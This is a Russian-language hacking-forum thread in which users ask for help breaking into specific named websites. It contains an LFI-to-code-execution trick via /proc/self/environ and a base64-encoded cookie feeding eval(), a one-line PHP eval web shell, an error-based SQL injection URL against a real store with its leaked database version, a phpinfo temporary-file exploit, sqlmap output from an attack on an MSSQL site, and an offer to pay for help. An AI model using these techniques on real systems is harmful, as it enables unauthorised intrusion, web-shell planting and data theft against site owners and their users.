Предыдущая тема там -> http://forum.antichat.ru/threads/46016/ В этой и только в этой теме вы можете задать вопрос про способ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках (для остального есть поиск по форуму). Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы, если вы хотите поделиться уязвимостью или нашли что-то новое и интересное в публичном двиге и хотите, чтобы вам помогли это разобрать. Задавать вопросы, ответы на которые с легкостью можно найти в многочисленных мануалах и статьях, вести личную переписку крайне не рекомендуется. Задавайте полный, четкий и внятный вопрос, который включает в себя описание найденной вами уязвимости, методы и способы, с помощью которых вы пытались ее проэксплуатировать, какие преграды при этом встретили. ЛОГИНЫ И ПАРОЛИ ПОСТИТЬ В ОТКРЫТОМ ВИДЕ ЗАПРЕЩЕНО
там не инкулд, там file_get_contents, а он читает содержимое файла в строку. но нет, прочитать тоже не выйдет, потому что у нас префикс в виде Code: http://tv.mail.ru/print_p.html
Парни, есть LFI на сайте, который позволяет читать /proc/self/environ Ставлю в User-Agent простейший php код -сайт отдает 400 ошибку. Что сделать можно?
/proc/self/environ Через логи не пробовал. Проканало когда я закодировал в base64 и отдал код как куки - енвайров их тоже читает получилось что то типа eval(base64_decode($shell_str)) Нельзя как то по эстетичнее?
а зачем вам эстетика? лейте полноценный шелл и все. этот вариант тоже вполне эстетичный. не все сводится к <?eval($_POST[a]);?>
tvnetcitoyenne.com/journal.php?article=Тут_Инклуд_Проходит&phpsessid=98e322270e7ed6ec12ff0d0e9b66cf2a Я не пойму как он фильтрует Юзер-Агент
http://store.1001host.ru/get/25'/3238264cd17791854de5 Кто подскажет, как раскрутить? Всё перепробовал... Готов заплатить за помощь.
Через error based http://store.1001host.ru/get/25'or(...version(),1))a)and(1)='1/3238264cd17791854de5 Query failed: Duplicate column name '5.1.62-log'
faza02, ты мне скидывал сплойт https://rdot.org/forum/showpost.php?p=18024&postcount=11 Я разобрал заголовки и у меня получился файл на 40 мб. https://www.sendspace.com/file/7vxeod Не пойму где передается имя временного файла. Ответ сервера всегда одинаковый: То есть нигде имя временного файла не передается. Что не так?
имя имя временного файла в есть в phpinfo(); вот строка из сплоента: Code: if ($line =~ m#tmp_name].+(/tmp/php.+)$#) {
Пробовал тут: https://autopaymentfinder.com/phpinfo.php И на тестовом сайте денвера файл с phpinfo. Тоже-самое
Ребят подскажите пожалуйста Расковырял скулю ,меп выдает [16:45:55] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: ColdFusion back-end DBMS: Microsoft SQL Server 2008 И находит 20+ бд При этом ,при запросе таблиц от туда ,выходит месага [16:46:42] [WARNING] the SQL query provided does not return any output [16:46:43] [WARNING] the SQL query provided does not return any output [16:46:44] [WARNING] the SQL query provided does not return any output [16:46:45] [WARNING] the SQL query provided does not return any output [16:46:46] [WARNING] the SQL query provided does not return any output [16:46:47] [WARNING] the SQL query provided does not return any output Тобишь ,ни одну бд он не открыл . Есть способы обхода ?
какие пути обхода? обход чего? кто должен угадывать, почему нет вывода? пишите сюда запросы, ошибки и все, что может пригодится для того, чтобы не угадывать, в чем у вас проблема
